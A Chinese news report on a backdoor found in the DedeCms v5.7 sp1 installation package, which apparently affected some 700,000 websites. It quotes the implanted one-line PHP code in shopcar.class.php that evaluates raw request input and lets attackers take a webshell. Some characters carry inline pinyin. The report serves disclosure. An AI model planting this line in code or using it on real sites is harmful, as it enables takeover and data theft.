3月22日消息,瑞星與360今日對(duì)外發(fā)布警示,稱國內(nèi)知名的PHP開源網(wǎng)站管理系統(tǒng)織夢CMS(DedeCms)v5.7 sp1版本安裝包被發(fā)現(xiàn)植入后門,黑客可通過此后門直接獲得網(wǎng)站的控制權(quán)限,獲取存儲(chǔ)在服務(wù)器上的文件和數(shù)據(jù)庫。
據(jù)織夢CMS官方數(shù)據(jù)顯示,目前約有70萬網(wǎng)站使用該系統(tǒng)搭建,涉及企業(yè)、政府機(jī)關(guān)、媒體機(jī)構(gòu)、行業(yè)及個(gè)人網(wǎng)站等。
安全界人士分析發(fā)現(xiàn),此次織夢CMS曝出的后門惡意代碼存在于購物車類文件(shopcar.class.php)中,此類文件被植入一句后門代碼“@eval(file_get_contents(‘php://input’));”。凡是調(diào)用該購物車類的文件均會(huì)觸發(fā)后門,黑客只需要構(gòu)造簡單的數(shù)據(jù)包提交到服務(wù)器,就能夠獲取到該網(wǎng)站的WebShell,通過對(duì)服務(wù)器進(jìn)一步滲透攻擊,進(jìn)而獲取服務(wù)器的最高權(quán)限,直接訪問服務(wù)器上的文件、數(shù)據(jù)庫等信息。
織夢CMS中被植入的后門代碼
推薦閱讀
日增用戶破3萬 金山網(wǎng)絡(luò)引領(lǐng)企業(yè)殺軟變革
徹底免費(fèi)的金山毒霸企業(yè)版2012,無疑將給企業(yè)版殺毒軟件市場帶來一場新的變革,高品質(zhì)的產(chǎn)品與服務(wù)將成為決定成敗的關(guān)鍵因素。分析人士認(rèn)為,金山毒霸企業(yè)版2012全面免費(fèi)標(biāo)志著我國企業(yè)版殺毒軟件市場正式進(jìn)入免費(fèi)互>>>詳細(xì)閱讀
本文標(biāo)題:織夢CMS系統(tǒng)被曝植入后門 黑客可獲網(wǎng)站控制權(quán)
地址:http://m.sdlzkt.com/a/guandian/yejie/20111230/161962.html
網(wǎng)友點(diǎn)評(píng)
精彩導(dǎo)讀
科技快報(bào)
品牌展示